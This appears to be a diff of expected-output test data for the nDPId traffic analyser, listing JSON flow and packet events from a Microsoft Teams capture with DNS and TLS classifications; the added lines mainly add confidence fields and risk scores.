+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1587041685136,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.250.123"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1587041685171,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685171,"pkt":"EBMx8Tl2KDc3AG3ICABFAABADGUAAP8RK\/DAqAEGwKgBAeRZADUALJr8l0UBAAABAAAAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQAB"}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1587041685185,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"ts_msec":1587041685185,"pkt":"KDc3AG3IEBMx8Tl2CABFAADeqaxAADkRFAvAqAEBwKgBBgA15FkAygAAl0WBgAABAAYAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQABwAwABQABAAAANQAMCXN1YnN0cmF0ZcAUwDAABQABAAAAxQAUCXN1YnN0cmF0ZQdtcy1hY2RjwBTASAAFAAEAAAAmAAgFYWZkLWvAFMBoAAUAAQAAACYAKBJvdXRsb29rLW9mZmljZS1jb20Gay0wMDAyCGstbXNlZGdlA25ldADAfAAFAAEAAACgAALAj8CPAAEAAQAAAJ8ABA1rEgs="}
-00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1587041685243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1587041685243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPU3QAAP8R5NHAqAEGwKgBAchtADUAO5eNyGMBAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAAB"}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1587041685256,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"ts_msec":1587041685256,"pkt":"KDc3AG3IEBMx8Tl2CABFAACb\/nFAADkRv4jAqAEBwKgBBgA1yG0AhwAAyGOBgAABAAAAAQAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAABwCEABgABAAAADgBABHByZDEOYXp1cmVkbnMtY2xvdWTAKgZtc25oc3QJbWljcm9zb2Z0A2NvbQB9o\/w8AAADhAAAASwACTqAAAAAPA=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01225{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}}
+00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01331{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="}
